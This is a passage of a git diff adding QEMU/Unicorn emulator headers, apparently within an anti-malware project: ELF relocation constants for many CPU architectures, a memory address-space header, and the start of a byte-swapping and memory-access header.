R_MIPS_CALLLO16 31 +/* + * This range is reserved for vendor specific relocations. 
+ */ +#define R_MIPS_LOVENDOR 100 +#define R_MIPS_HIVENDOR 127 + +/* + * Sparc ELF relocation types + */ +#define R_SPARC_NONE 0 +#define R_SPARC_8 1 +#define R_SPARC_16 2 +#define R_SPARC_32 3 +#define R_SPARC_DISP8 4 +#define R_SPARC_DISP16 5 +#define R_SPARC_DISP32 6 +#define R_SPARC_WDISP30 7 +#define R_SPARC_WDISP22 8 +#define R_SPARC_HI22 9 +#define R_SPARC_22 10 +#define R_SPARC_13 11 +#define R_SPARC_LO10 12 +#define R_SPARC_GOT10 13 +#define R_SPARC_GOT13 14 +#define R_SPARC_GOT22 15 +#define R_SPARC_PC10 16 +#define R_SPARC_PC22 17 +#define R_SPARC_WPLT30 18 +#define R_SPARC_COPY 19 +#define R_SPARC_GLOB_DAT 20 +#define R_SPARC_JMP_SLOT 21 +#define R_SPARC_RELATIVE 22 +#define R_SPARC_UA32 23 +#define R_SPARC_PLT32 24 +#define R_SPARC_HIPLT22 25 +#define R_SPARC_LOPLT10 26 +#define R_SPARC_PCPLT32 27 +#define R_SPARC_PCPLT22 28 +#define R_SPARC_PCPLT10 29 +#define R_SPARC_10 30 +#define R_SPARC_11 31 +#define R_SPARC_64 32 +#define R_SPARC_OLO10 33 +#define R_SPARC_HH22 34 +#define R_SPARC_HM10 35 +#define R_SPARC_LM22 36 +#define R_SPARC_WDISP16 40 +#define R_SPARC_WDISP19 41 +#define R_SPARC_7 43 +#define R_SPARC_5 44 +#define R_SPARC_6 45 + + +/* Bits present in AT_HWCAP for ARM. */ +#define HWCAP_ARM_IDIVA (1 << 17) + +/* Bits present in AT_HWCAP for s390. */ +#define HWCAP_S390_STFLE 4 + +/* Bits present in AT_HWCAP for Sparc. */ +#define HWCAP_SPARC_VIS3 0x00020000 + +/* Bits present in AT_HWCAP for PowerPC. 
*/ +#define PPC_FEATURE_ARCH_2_06 0x00000100 + +/* Symbolic values for the entries in the auxiliary table + put on the initial stack */ +#define AT_PLATFORM 15 /* string identifying CPU for optimizations */ +#define AT_HWCAP 16 /* arch dependent hints at CPU capabilities */ +#define AT_DCACHEBSIZE 19 /* data cache block size */ +#define AT_ICACHEBSIZE 20 /* instruction cache block size */ + +/* + * 68k ELF relocation types + */ +#define R_68K_NONE 0 +#define R_68K_32 1 +#define R_68K_16 2 +#define R_68K_8 3 +#define R_68K_PC32 4 +#define R_68K_PC16 5 +#define R_68K_PC8 6 +#define R_68K_GOT32 7 +#define R_68K_GOT16 8 +#define R_68K_GOT8 9 +#define R_68K_GOT32O 10 +#define R_68K_GOT16O 11 +#define R_68K_GOT8O 12 +#define R_68K_PLT32 13 +#define R_68K_PLT16 14 +#define R_68K_PLT8 15 +#define R_68K_PLT32O 16 +#define R_68K_PLT16O 17 +#define R_68K_PLT8O 18 +#define R_68K_COPY 19 +#define R_68K_GLOB_DAT 20 +#define R_68K_JMP_SLOT 21 +#define R_68K_RELATIVE 22 + +/* PowerPC relocations defined by the ABIs */ +#define R_PPC_NONE 0 +#define R_PPC_ADDR32 1 /* 32bit absolute address */ +#define R_PPC_ADDR24 2 /* 26bit address, 2 bits ignored. 
*/ +#define R_PPC_ADDR16 3 /* 16bit absolute address */ +#define R_PPC_ADDR16_LO 4 /* lower 16bit of absolute address */ +#define R_PPC_ADDR16_HI 5 /* high 16bit of absolute address */ +#define R_PPC_ADDR16_HA 6 /* adjusted high 16bit */ +#define R_PPC_ADDR14 7 /* 16bit address, 2 bits ignored */ +#define R_PPC_ADDR14_BRTAKEN 8 +#define R_PPC_ADDR14_BRNTAKEN 9 +#define R_PPC_REL24 10 /* PC relative 26 bit */ +#define R_PPC_REL14 11 /* PC relative 16 bit */ +#define R_PPC_REL14_BRTAKEN 12 +#define R_PPC_REL14_BRNTAKEN 13 +#define R_PPC_GOT16 14 +#define R_PPC_GOT16_LO 15 +#define R_PPC_GOT16_HI 16 +#define R_PPC_GOT16_HA 17 +#define R_PPC_PLTREL24 18 +#define R_PPC_COPY 19 +#define R_PPC_GLOB_DAT 20 +#define R_PPC_JMP_SLOT 21 +#define R_PPC_RELATIVE 22 +#define R_PPC_LOCAL24PC 23 +#define R_PPC_UADDR32 24 +#define R_PPC_UADDR16 25 +#define R_PPC_REL32 26 +#define R_PPC_PLT32 27 +#define R_PPC_PLTREL32 28 +#define R_PPC_PLT16_LO 29 +#define R_PPC_PLT16_HI 30 +#define R_PPC_PLT16_HA 31 +#define R_PPC_SDAREL16 32 +#define R_PPC_SECTOFF 33 +#define R_PPC_SECTOFF_LO 34 +#define R_PPC_SECTOFF_HI 35 +#define R_PPC_SECTOFF_HA 36 +/* Keep this the last entry. */ +#ifndef R_PPC_NUM +#define R_PPC_NUM 37 +#endif + +/* ARM relocs. 
*/ +#define R_ARM_NONE 0 /* No reloc */ +#define R_ARM_PC24 1 /* PC relative 26 bit branch */ +#define R_ARM_ABS32 2 /* Direct 32 bit */ +#define R_ARM_REL32 3 /* PC relative 32 bit */ +#define R_ARM_PC13 4 +#define R_ARM_ABS16 5 /* Direct 16 bit */ +#define R_ARM_ABS12 6 /* Direct 12 bit */ +#define R_ARM_THM_ABS5 7 +#define R_ARM_ABS8 8 /* Direct 8 bit */ +#define R_ARM_SBREL32 9 +#define R_ARM_THM_PC22 10 +#define R_ARM_THM_PC8 11 +#define R_ARM_AMP_VCALL9 12 +#define R_ARM_SWI24 13 +#define R_ARM_THM_SWI8 14 +#define R_ARM_XPC25 15 +#define R_ARM_THM_XPC22 16 +#define R_ARM_COPY 20 /* Copy symbol at runtime */ +#define R_ARM_GLOB_DAT 21 /* Create GOT entry */ +#define R_ARM_JUMP_SLOT 22 /* Create PLT entry */ +#define R_ARM_RELATIVE 23 /* Adjust by program base */ +#define R_ARM_GOTOFF 24 /* 32 bit offset to GOT */ +#define R_ARM_GOTPC 25 /* 32 bit PC relative offset to GOT */ +#define R_ARM_GOT32 26 /* 32 bit GOT entry */ +#define R_ARM_PLT32 27 /* 32 bit PLT address */ +#define R_ARM_CALL 28 +#define R_ARM_JUMP24 29 +#define R_ARM_GNU_VTENTRY 100 +#define R_ARM_GNU_VTINHERIT 101 +#define R_ARM_THM_PC11 102 /* thumb unconditional branch */ +#define R_ARM_THM_PC9 103 /* thumb conditional branch */ +#define R_ARM_RXPC25 249 +#define R_ARM_RSBREL32 250 +#define R_ARM_THM_RPC22 251 +#define R_ARM_RREL32 252 +#define R_ARM_RABS22 253 +#define R_ARM_RPC24 254 +#define R_ARM_RBASE 255 +/* Keep this the last entry. 
*/ +#define R_ARM_NUM 256 + +/* ARM Aarch64 relocation types */ +#define R_AARCH64_NONE 256 /* also accepts R_ARM_NONE (0) */ +/* static data relocations */ +#define R_AARCH64_ABS64 257 +#define R_AARCH64_ABS32 258 +#define R_AARCH64_ABS16 259 +#define R_AARCH64_PREL64 260 +#define R_AARCH64_PREL32 261 +#define R_AARCH64_PREL16 262 +/* static aarch64 group relocations */ +/* group relocs to create unsigned data value or address inline */ +#define R_AARCH64_MOVW_UABS_G0 263 +#define R_AARCH64_MOVW_UABS_G0_NC 264 +#define R_AARCH64_MOVW_UABS_G1 265 +#define R_AARCH64_MOVW_UABS_G1_NC 266 +#define R_AARCH64_MOVW_UABS_G2 267 +#define R_AARCH64_MOVW_UABS_G2_NC 268 +#define R_AARCH64_MOVW_UABS_G3 269 +/* group relocs to create signed data or offset value inline */ +#define R_AARCH64_MOVW_SABS_G0 270 +#define R_AARCH64_MOVW_SABS_G1 271 +#define R_AARCH64_MOVW_SABS_G2 272 +/* relocs to generate 19, 21, and 33 bit PC-relative addresses */ +#define R_AARCH64_LD_PREL_LO19 273 +#define R_AARCH64_ADR_PREL_LO21 274 +#define R_AARCH64_ADR_PREL_PG_HI21 275 +#define R_AARCH64_ADR_PREL_PG_HI21_NC 276 +#define R_AARCH64_ADD_ABS_LO12_NC 277 +#define R_AARCH64_LDST8_ABS_LO12_NC 278 +#define R_AARCH64_LDST16_ABS_LO12_NC 284 +#define R_AARCH64_LDST32_ABS_LO12_NC 285 +#define R_AARCH64_LDST64_ABS_LO12_NC 286 +#define R_AARCH64_LDST128_ABS_LO12_NC 299 +/* relocs for control-flow - all offsets as multiple of 4 */ +#define R_AARCH64_TSTBR14 279 +#define R_AARCH64_CONDBR19 280 +#define R_AARCH64_JUMP26 282 +#define R_AARCH64_CALL26 283 +/* group relocs to create pc-relative offset inline */ +#define R_AARCH64_MOVW_PREL_G0 287 +#define R_AARCH64_MOVW_PREL_G0_NC 288 +#define R_AARCH64_MOVW_PREL_G1 289 +#define R_AARCH64_MOVW_PREL_G1_NC 290 +#define R_AARCH64_MOVW_PREL_G2 291 +#define R_AARCH64_MOVW_PREL_G2_NC 292 +#define R_AARCH64_MOVW_PREL_G3 293 +/* group relocs to create a GOT-relative offset inline */ +#define R_AARCH64_MOVW_GOTOFF_G0 300 +#define R_AARCH64_MOVW_GOTOFF_G0_NC 301 +#define 
R_AARCH64_MOVW_GOTOFF_G1 302 +#define R_AARCH64_MOVW_GOTOFF_G1_NC 303 +#define R_AARCH64_MOVW_GOTOFF_G2 304 +#define R_AARCH64_MOVW_GOTOFF_G2_NC 305 +#define R_AARCH64_MOVW_GOTOFF_G3 306 +/* GOT-relative data relocs */ +#define R_AARCH64_GOTREL64 307 +#define R_AARCH64_GOTREL32 308 +/* GOT-relative instr relocs */ +#define R_AARCH64_GOT_LD_PREL19 309 +#define R_AARCH64_LD64_GOTOFF_LO15 310 +#define R_AARCH64_ADR_GOT_PAGE 311 +#define R_AARCH64_LD64_GOT_LO12_NC 312 +#define R_AARCH64_LD64_GOTPAGE_LO15 313 +/* General Dynamic TLS relocations */ +#define R_AARCH64_TLSGD_ADR_PREL21 512 +#define R_AARCH64_TLSGD_ADR_PAGE21 513 +#define R_AARCH64_TLSGD_ADD_LO12_NC 514 +#define R_AARCH64_TLSGD_MOVW_G1 515 +#define R_AARCH64_TLSGD_MOVW_G0_NC 516 +/* Local Dynamic TLS relocations */ +#define R_AARCH64_TLSLD_ADR_PREL21 517 +#define R_AARCH64_TLSLD_ADR_PAGE21 518 +#define R_AARCH64_TLSLD_ADD_LO12_NC 519 +#define R_AARCH64_TLSLD_MOVW_G1 520 +#define R_AARCH64_TLSLD_MOVW_G0_NC 521 +#define R_AARCH64_TLSLD_LD_PREL19 522 +#define R_AARCH64_TLSLD_MOVW_DTPREL_G2 523 +#define R_AARCH64_TLSLD_MOVW_DTPREL_G1 524 +#define R_AARCH64_TLSLD_MOVW_DTPREL_G1_NC 525 +#define R_AARCH64_TLSLD_MOVW_DTPREL_G0 526 +#define R_AARCH64_TLSLD_MOVW_DTPREL_G0_NC 527 +#define R_AARCH64_TLSLD_ADD_DTPREL_HI12 528 +#define R_AARCH64_TLSLD_ADD_DTPREL_LO12 529 +#define R_AARCH64_TLSLD_ADD_DTPREL_LO12_NC 530 +#define R_AARCH64_TLSLD_LDST8_DTPREL_LO12 531 +#define R_AARCH64_TLSLD_LDST8_DTPREL_LO12_NC 532 +#define R_AARCH64_TLSLD_LDST16_DTPREL_LO12 533 +#define R_AARCH64_TLSLD_LDST16_DTPREL_LO12_NC 534 +#define R_AARCH64_TLSLD_LDST32_DTPREL_LO12 535 +#define R_AARCH64_TLSLD_LDST32_DTPREL_LO12_NC 536 +#define R_AARCH64_TLSLD_LDST64_DTPREL_LO12 537 +#define R_AARCH64_TLSLD_LDST64_DTPREL_LO12_NC 538 +/* initial exec TLS relocations */ +#define R_AARCH64_TLSIE_MOVW_GOTTPREL_G1 539 +#define R_AARCH64_TLSIE_MOVW_GOTTPREL_G0_NC 540 +#define R_AARCH64_TLSIE_ADR_GOTTPREL_PAGE21 541 +#define 
R_AARCH64_TLSIE_LD64_GOTTPREL_LO12_NC 542 +#define R_AARCH64_TLSIE_LD_GOTTPREL_PREL19 543 +/* local exec TLS relocations */ +#define R_AARCH64_TLSLE_MOVW_TPREL_G2 544 +#define R_AARCH64_TLSLE_MOVW_TPREL_G1 545 +#define R_AARCH64_TLSLE_MOVW_TPREL_G1_NC 546 +#define R_AARCH64_TLSLE_MOVW_TPREL_G0 547 +#define R_AARCH64_TLSLE_MOVW_TPREL_G0_NC 548 +#define R_AARCH64_TLSLE_ADD_TPREL_HI12 549 +#define R_AARCH64_TLSLE_ADD_TPREL_LO12 550 +#define R_AARCH64_TLSLE_ADD_TPREL_LO12_NC 551 +#define R_AARCH64_TLSLE_LDST8_TPREL_LO12 552 +#define R_AARCH64_TLSLE_LDST8_TPREL_LO12_NC 553 +#define R_AARCH64_TLSLE_LDST16_TPREL_LO12 554 +#define R_AARCH64_TLSLE_LDST16_TPREL_LO12_NC 555 +#define R_AARCH64_TLSLE_LDST32_TPREL_LO12 556 +#define R_AARCH64_TLSLE_LDST32_TPREL_LO12_NC 557 +#define R_AARCH64_TLSLE_LDST64_TPREL_LO12 558 +#define R_AARCH64_TLSLE_LDST64_TPREL_LO12_NC 559 +/* Dynamic Relocations */ +#define R_AARCH64_COPY 1024 +#define R_AARCH64_GLOB_DAT 1025 +#define R_AARCH64_JUMP_SLOT 1026 +#define R_AARCH64_RELATIVE 1027 +#define R_AARCH64_TLS_DTPREL64 1028 +#define R_AARCH64_TLS_DTPMOD64 1029 +#define R_AARCH64_TLS_TPREL64 1030 +#define R_AARCH64_TLS_DTPREL32 1031 +#define R_AARCH64_TLS_DTPMOD32 1032 +#define R_AARCH64_TLS_TPREL32 1033 + +/* s390 relocations defined by the ABIs */ +#define R_390_NONE 0 /* No reloc. */ +#define R_390_8 1 /* Direct 8 bit. */ +#define R_390_12 2 /* Direct 12 bit. */ +#define R_390_16 3 /* Direct 16 bit. */ +#define R_390_32 4 /* Direct 32 bit. */ +#define R_390_PC32 5 /* PC relative 32 bit. */ +#define R_390_GOT12 6 /* 12 bit GOT offset. */ +#define R_390_GOT32 7 /* 32 bit GOT offset. */ +#define R_390_PLT32 8 /* 32 bit PC relative PLT address. */ +#define R_390_COPY 9 /* Copy symbol at runtime. */ +#define R_390_GLOB_DAT 10 /* Create GOT entry. */ +#define R_390_JMP_SLOT 11 /* Create PLT entry. */ +#define R_390_RELATIVE 12 /* Adjust by program base. */ +#define R_390_GOTOFF32 13 /* 32 bit offset to GOT. 
*/ +#define R_390_GOTPC 14 /* 32 bit PC rel. offset to GOT. */ +#define R_390_GOT16 15 /* 16 bit GOT offset. */ +#define R_390_PC16 16 /* PC relative 16 bit. */ +#define R_390_PC16DBL 17 /* PC relative 16 bit shifted by 1. */ +#define R_390_PLT16DBL 18 /* 16 bit PC rel. PLT shifted by 1. */ +#define R_390_PC32DBL 19 /* PC relative 32 bit shifted by 1. */ +#define R_390_PLT32DBL 20 /* 32 bit PC rel. PLT shifted by 1. */ +#define R_390_GOTPCDBL 21 /* 32 bit PC rel. GOT shifted by 1. */ +#define R_390_64 22 /* Direct 64 bit. */ +#define R_390_PC64 23 /* PC relative 64 bit. */ +#define R_390_GOT64 24 /* 64 bit GOT offset. */ +#define R_390_PLT64 25 /* 64 bit PC relative PLT address. */ +#define R_390_GOTENT 26 /* 32 bit PC rel. to GOT entry >> 1. */ +#define R_390_GOTOFF16 27 /* 16 bit offset to GOT. */ +#define R_390_GOTOFF64 28 /* 64 bit offset to GOT. */ +#define R_390_GOTPLT12 29 /* 12 bit offset to jump slot. */ +#define R_390_GOTPLT16 30 /* 16 bit offset to jump slot. */ +#define R_390_GOTPLT32 31 /* 32 bit offset to jump slot. */ +#define R_390_GOTPLT64 32 /* 64 bit offset to jump slot. */ +#define R_390_GOTPLTENT 33 /* 32 bit rel. offset to jump slot. */ +#define R_390_PLTOFF16 34 /* 16 bit offset from GOT to PLT. */ +#define R_390_PLTOFF32 35 /* 32 bit offset from GOT to PLT. */ +#define R_390_PLTOFF64 36 /* 64 bit offset from GOT to PLT. */ +#define R_390_TLS_LOAD 37 /* Tag for load insn in TLS code. */ +#define R_390_TLS_GDCALL 38 /* Tag for function call in general + dynamic TLS code. */ +#define R_390_TLS_LDCALL 39 /* Tag for function call in local + dynamic TLS code. */ +#define R_390_TLS_GD32 40 /* Direct 32 bit for general dynamic + thread local data. */ +#define R_390_TLS_GD64 41 /* Direct 64 bit for general dynamic + thread local data. */ +#define R_390_TLS_GOTIE12 42 /* 12 bit GOT offset for static TLS + block offset. */ +#define R_390_TLS_GOTIE32 43 /* 32 bit GOT offset for static TLS + block offset. 
*/ +#define R_390_TLS_GOTIE64 44 /* 64 bit GOT offset for static TLS + block offset. */ +#define R_390_TLS_LDM32 45 /* Direct 32 bit for local dynamic + thread local data in LD code. */ +#define R_390_TLS_LDM64 46 /* Direct 64 bit for local dynamic + thread local data in LD code. */ +#define R_390_TLS_IE32 47 /* 32 bit address of GOT entry for + negated static TLS block offset. */ +#define R_390_TLS_IE64 48 /* 64 bit address of GOT entry for + negated static TLS block offset. */ +#define R_390_TLS_IEENT 49 /* 32 bit rel. offset to GOT entry for + negated static TLS block offset. */ +#define R_390_TLS_LE32 50 /* 32 bit negated offset relative to + static TLS block. */ +#define R_390_TLS_LE64 51 /* 64 bit negated offset relative to + static TLS block. */ +#define R_390_TLS_LDO32 52 /* 32 bit offset relative to TLS + block. */ +#define R_390_TLS_LDO64 53 /* 64 bit offset relative to TLS + block. */ +#define R_390_TLS_DTPMOD 54 /* ID of module containing symbol. */ +#define R_390_TLS_DTPOFF 55 /* Offset in TLS block. */ +#define R_390_TLS_TPOFF 56 /* Negate offset in static TLS + block. */ +/* Keep this the last entry. 
*/ +#define R_390_NUM 57 + +/* x86-64 relocation types */ +#define R_X86_64_NONE 0 /* No reloc */ +#define R_X86_64_64 1 /* Direct 64 bit */ +#define R_X86_64_PC32 2 /* PC relative 32 bit signed */ +#define R_X86_64_GOT32 3 /* 32 bit GOT entry */ +#define R_X86_64_PLT32 4 /* 32 bit PLT address */ +#define R_X86_64_COPY 5 /* Copy symbol at runtime */ +#define R_X86_64_GLOB_DAT 6 /* Create GOT entry */ +#define R_X86_64_JUMP_SLOT 7 /* Create PLT entry */ +#define R_X86_64_RELATIVE 8 /* Adjust by program base */ +#define R_X86_64_GOTPCREL 9 /* 32 bit signed pc relative + offset to GOT */ +#define R_X86_64_32 10 /* Direct 32 bit zero extended */ +#define R_X86_64_32S 11 /* Direct 32 bit sign extended */ +#define R_X86_64_16 12 /* Direct 16 bit zero extended */ +#define R_X86_64_PC16 13 /* 16 bit sign extended pc relative */ +#define R_X86_64_8 14 /* Direct 8 bit sign extended */ +#define R_X86_64_PC8 15 /* 8 bit sign extended pc relative */ + +#define R_X86_64_NUM 16 + +/* IA-64 relocations. 
*/ +#define R_IA64_NONE 0x00 /* none */ +#define R_IA64_IMM14 0x21 /* symbol + addend, add imm14 */ +#define R_IA64_IMM22 0x22 /* symbol + addend, add imm22 */ +#define R_IA64_IMM64 0x23 /* symbol + addend, mov imm64 */ +#define R_IA64_DIR32MSB 0x24 /* symbol + addend, data4 MSB */ +#define R_IA64_DIR32LSB 0x25 /* symbol + addend, data4 LSB */ +#define R_IA64_DIR64MSB 0x26 /* symbol + addend, data8 MSB */ +#define R_IA64_DIR64LSB 0x27 /* symbol + addend, data8 LSB */ +#define R_IA64_GPREL22 0x2a /* @gprel(sym + add), add imm22 */ +#define R_IA64_GPREL64I 0x2b /* @gprel(sym + add), mov imm64 */ +#define R_IA64_GPREL32MSB 0x2c /* @gprel(sym + add), data4 MSB */ +#define R_IA64_GPREL32LSB 0x2d /* @gprel(sym + add), data4 LSB */ +#define R_IA64_GPREL64MSB 0x2e /* @gprel(sym + add), data8 MSB */ +#define R_IA64_GPREL64LSB 0x2f /* @gprel(sym + add), data8 LSB */ +#define R_IA64_LTOFF22 0x32 /* @ltoff(sym + add), add imm22 */ +#define R_IA64_LTOFF64I 0x33 /* @ltoff(sym + add), mov imm64 */ +#define R_IA64_PLTOFF22 0x3a /* @pltoff(sym + add), add imm22 */ +#define R_IA64_PLTOFF64I 0x3b /* @pltoff(sym + add), mov imm64 */ +#define R_IA64_PLTOFF64MSB 0x3e /* @pltoff(sym + add), data8 MSB */ +#define R_IA64_PLTOFF64LSB 0x3f /* @pltoff(sym + add), data8 LSB */ +#define R_IA64_FPTR64I 0x43 /* @fptr(sym + add), mov imm64 */ +#define R_IA64_FPTR32MSB 0x44 /* @fptr(sym + add), data4 MSB */ +#define R_IA64_FPTR32LSB 0x45 /* @fptr(sym + add), data4 LSB */ +#define R_IA64_FPTR64MSB 0x46 /* @fptr(sym + add), data8 MSB */ +#define R_IA64_FPTR64LSB 0x47 /* @fptr(sym + add), data8 LSB */ +#define R_IA64_PCREL60B 0x48 /* @pcrel(sym + add), brl */ +#define R_IA64_PCREL21B 0x49 /* @pcrel(sym + add), ptb, call */ +#define R_IA64_PCREL21M 0x4a /* @pcrel(sym + add), chk.s */ +#define R_IA64_PCREL21F 0x4b /* @pcrel(sym + add), fchkf */ +#define R_IA64_PCREL32MSB 0x4c /* @pcrel(sym + add), data4 MSB */ +#define R_IA64_PCREL32LSB 0x4d /* @pcrel(sym + add), data4 LSB */ +#define R_IA64_PCREL64MSB 
0x4e /* @pcrel(sym + add), data8 MSB */ +#define R_IA64_PCREL64LSB 0x4f /* @pcrel(sym + add), data8 LSB */ +#define R_IA64_LTOFF_FPTR22 0x52 /* @ltoff(@fptr(s+a)), imm22 */ +#define R_IA64_LTOFF_FPTR64I 0x53 /* @ltoff(@fptr(s+a)), imm64 */ +#define R_IA64_LTOFF_FPTR32MSB 0x54 /* @ltoff(@fptr(s+a)), data4 MSB */ +#define R_IA64_LTOFF_FPTR32LSB 0x55 /* @ltoff(@fptr(s+a)), data4 LSB */ +#define R_IA64_LTOFF_FPTR64MSB 0x56 /* @ltoff(@fptr(s+a)), data8 MSB */ +#define R_IA64_LTOFF_FPTR64LSB 0x57 /* @ltoff(@fptr(s+a)), data8 LSB */ +#define R_IA64_SEGREL32MSB 0x5c /* @segrel(sym + add), data4 MSB */ +#define R_IA64_SEGREL32LSB 0x5d /* @segrel(sym + add), data4 LSB */ +#define R_IA64_SEGREL64MSB 0x5e /* @segrel(sym + add), data8 MSB */ +#define R_IA64_SEGREL64LSB 0x5f /* @segrel(sym + add), data8 LSB */ +#define R_IA64_SECREL32MSB 0x64 /* @secrel(sym + add), data4 MSB */ +#define R_IA64_SECREL32LSB 0x65 /* @secrel(sym + add), data4 LSB */ +#define R_IA64_SECREL64MSB 0x66 /* @secrel(sym + add), data8 MSB */ +#define R_IA64_SECREL64LSB 0x67 /* @secrel(sym + add), data8 LSB */ +#define R_IA64_REL32MSB 0x6c /* data 4 + REL */ +#define R_IA64_REL32LSB 0x6d /* data 4 + REL */ +#define R_IA64_REL64MSB 0x6e /* data 8 + REL */ +#define R_IA64_REL64LSB 0x6f /* data 8 + REL */ +#define R_IA64_LTV32MSB 0x74 /* symbol + addend, data4 MSB */ +#define R_IA64_LTV32LSB 0x75 /* symbol + addend, data4 LSB */ +#define R_IA64_LTV64MSB 0x76 /* symbol + addend, data8 MSB */ +#define R_IA64_LTV64LSB 0x77 /* symbol + addend, data8 LSB */ +#define R_IA64_PCREL21BI 0x79 /* @pcrel(sym + add), 21bit inst */ +#define R_IA64_PCREL22 0x7a /* @pcrel(sym + add), 22bit inst */ +#define R_IA64_PCREL64I 0x7b /* @pcrel(sym + add), 64bit inst */ +#define R_IA64_IPLTMSB 0x80 /* dynamic reloc, imported PLT, MSB */ +#define R_IA64_IPLTLSB 0x81 /* dynamic reloc, imported PLT, LSB */ +#define R_IA64_COPY 0x84 /* copy relocation */ +#define R_IA64_SUB 0x85 /* Addend and symbol difference */ +#define R_IA64_LTOFF22X 
0x86 /* LTOFF22, relaxable. */ +#define R_IA64_LDXMOV 0x87 /* Use of LTOFF22X. */ +#define R_IA64_TPREL14 0x91 /* @tprel(sym + add), imm14 */ +#define R_IA64_TPREL22 0x92 /* @tprel(sym + add), imm22 */ +#define R_IA64_TPREL64I 0x93 /* @tprel(sym + add), imm64 */ +#define R_IA64_TPREL64MSB 0x96 /* @tprel(sym + add), data8 MSB */ +#define R_IA64_TPREL64LSB 0x97 /* @tprel(sym + add), data8 LSB */ +#define R_IA64_LTOFF_TPREL22 0x9a /* @ltoff(@tprel(s+a)), imm2 */ +#define R_IA64_DTPMOD64MSB 0xa6 /* @dtpmod(sym + add), data8 MSB */ +#define R_IA64_DTPMOD64LSB 0xa7 /* @dtpmod(sym + add), data8 LSB */ +#define R_IA64_LTOFF_DTPMOD22 0xaa /* @ltoff(@dtpmod(sym + add)), imm22 */ +#define R_IA64_DTPREL14 0xb1 /* @dtprel(sym + add), imm14 */ +#define R_IA64_DTPREL22 0xb2 /* @dtprel(sym + add), imm22 */ +#define R_IA64_DTPREL64I 0xb3 /* @dtprel(sym + add), imm64 */ +#define R_IA64_DTPREL32MSB 0xb4 /* @dtprel(sym + add), data4 MSB */ +#define R_IA64_DTPREL32LSB 0xb5 /* @dtprel(sym + add), data4 LSB */ +#define R_IA64_DTPREL64MSB 0xb6 /* @dtprel(sym + add), data8 MSB */ +#define R_IA64_DTPREL64LSB 0xb7 /* @dtprel(sym + add), data8 LSB */ +#define R_IA64_LTOFF_DTPREL22 0xba /* @ltoff(@dtprel(s+a)), imm22 */ + +#endif /* QEMU_ELF_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/address-spaces.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/address-spaces.h new file mode 100644 index 0000000..58e825a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/address-spaces.h @@ -0,0 +1,35 @@ +/* + * Internal memory management interfaces + * + * Copyright 2011 Red Hat, Inc. and/or its affiliates + * + * Authors: + * Avi Kivity <avi@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2. See + * the COPYING file in the top-level directory. + * + */ + +#ifndef EXEC_MEMORY_H +#define EXEC_MEMORY_H + +/* + * Internal interfaces between memory.c/exec.c/vl.c. Do not #include unless + * you're one of them. 
+ */ + +#include "exec/memory.h" + +#ifndef CONFIG_USER_ONLY + +/* Get the root memory region. This interface should only be used temporarily + * until a proper bus interface is available. + */ +MemoryRegion *get_system_memory(struct uc_struct *uc); + +extern AddressSpace address_space_memory; + +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-all.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-all.h new file mode 100644 index 0000000..6d196ba --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/exec/cpu-all.h @@ -0,0 +1,309 @@ +/* + * defines common to all virtual CPUs + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/>. + */ +#ifndef CPU_ALL_H +#define CPU_ALL_H + +#include "qemu-common.h" +#include "exec/cpu-common.h" +#include "exec/memory.h" +#include "qemu/thread.h" +#include "qom/cpu.h" + +/* some important defines: + * + * WORDS_ALIGNED : if defined, the host cpu can only make word aligned + * memory accesses. + * + * HOST_WORDS_BIGENDIAN : if defined, the host cpu is big endian and + * otherwise little endian. 
+ * + * (TARGET_WORDS_ALIGNED : same for target cpu (not supported yet)) + * + * TARGET_WORDS_BIGENDIAN : same for target cpu + */ + +#if defined(HOST_WORDS_BIGENDIAN) != defined(TARGET_WORDS_BIGENDIAN) +#define BSWAP_NEEDED +#endif + +#ifdef BSWAP_NEEDED + +static inline uint16_t tswap16(uint16_t s) +{ + return bswap16(s); +} + +static inline uint32_t tswap32(uint32_t s) +{ + return bswap32(s); +} + +static inline uint64_t tswap64(uint64_t s) +{ + return bswap64(s); +} + +static inline void tswap16s(uint16_t *s) +{ + *s = bswap16(*s); +} + +static inline void tswap32s(uint32_t *s) +{ + *s = bswap32(*s); +} + +static inline void tswap64s(uint64_t *s) +{ + *s = bswap64(*s); +} + +#else + +static inline uint16_t tswap16(uint16_t s) +{ + return s; +} + +static inline uint32_t tswap32(uint32_t s) +{ + return s; +} + +static inline uint64_t tswap64(uint64_t s) +{ + return s; +} + +static inline void tswap16s(uint16_t *s) +{ +} + +static inline void tswap32s(uint32_t *s) +{ +} + +static inline void tswap64s(uint64_t *s) +{ +} + +#endif + +#if TARGET_LONG_SIZE == 4 +#define tswapl(s) tswap32(s) +#define tswapls(s) tswap32s((uint32_t *)(s)) +#define bswaptls(s) bswap32s(s) +#else +#define tswapl(s) tswap64(s) +#define tswapls(s) tswap64s((uint64_t *)(s)) +#define bswaptls(s) bswap64s(s) +#endif + +/* CPU memory access without any memory or io remapping */ + +/* + * the generic syntax for the memory accesses is: + * + * load: ld{type}{sign}{size}{endian}_{access_type}(ptr) + * + * store: st{type}{size}{endian}_{access_type}(ptr, val) + * + * type is: + * (empty): integer access + * f : float access + * + * sign is: + * (empty): for floats or 32 bit size + * u : unsigned + * s : signed + * + * size is: + * b: 8 bits + * w: 16 bits + * l: 32 bits + * q: 64 bits + * + * endian is: + * (empty): target cpu endianness or 8 bit access + * r : reversed target cpu endianness (not implemented yet) + * be : big endian (not implemented yet) + * le : little endian (not implemented yet) 
